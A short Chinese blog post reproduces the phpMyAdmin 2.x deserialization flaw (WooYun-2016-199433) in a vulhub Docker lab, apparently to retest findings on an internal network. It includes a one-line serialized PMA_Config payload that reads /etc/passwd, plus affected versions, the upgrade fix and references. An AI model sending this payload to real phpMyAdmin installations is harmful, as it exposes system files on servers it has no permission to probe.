phpMyAdmin 2.x版本反序列化漏洞复现(WooYun-2016-199433)

简介

这几天发现内网环境出现几起WooYun-2016-199433漏洞,需要复测协助解决漏洞;

phpmyadmin是一套开源的、基于Web的Mysql数据库管理工具;

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

漏洞环境

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

这里使用vulhub一键搭建漏洞环境

漏洞复现

启动漏洞环境:docker-compose up -d

 访问漏洞地址:

写入执行POC读取passwd文件:action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

漏洞分析

https://docs.ioin.in/writeup/www.mottoin.com/4cb63e7c-9151-42da-a5bd-e6e29e7ff2f8/index.html

影响版本

phpmyadmin 2.x版本

漏洞修复

升级版本

参考

https://www.cnblogs.com/xhds/p/12579425.html

https://www.cnblogs.com/null1433/p/12809368.html

https://www.pianshen.com/article/3531179499/

https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/

https://docs.ioin.in/writeup/www.mottoin.com/4cb63e7c-9151-42da-a5bd-e6e29e7ff2f8/index.html

posted @ 2020-12-31 11:16  pipiqiu  阅读(528)  评论(0编辑  收藏  举报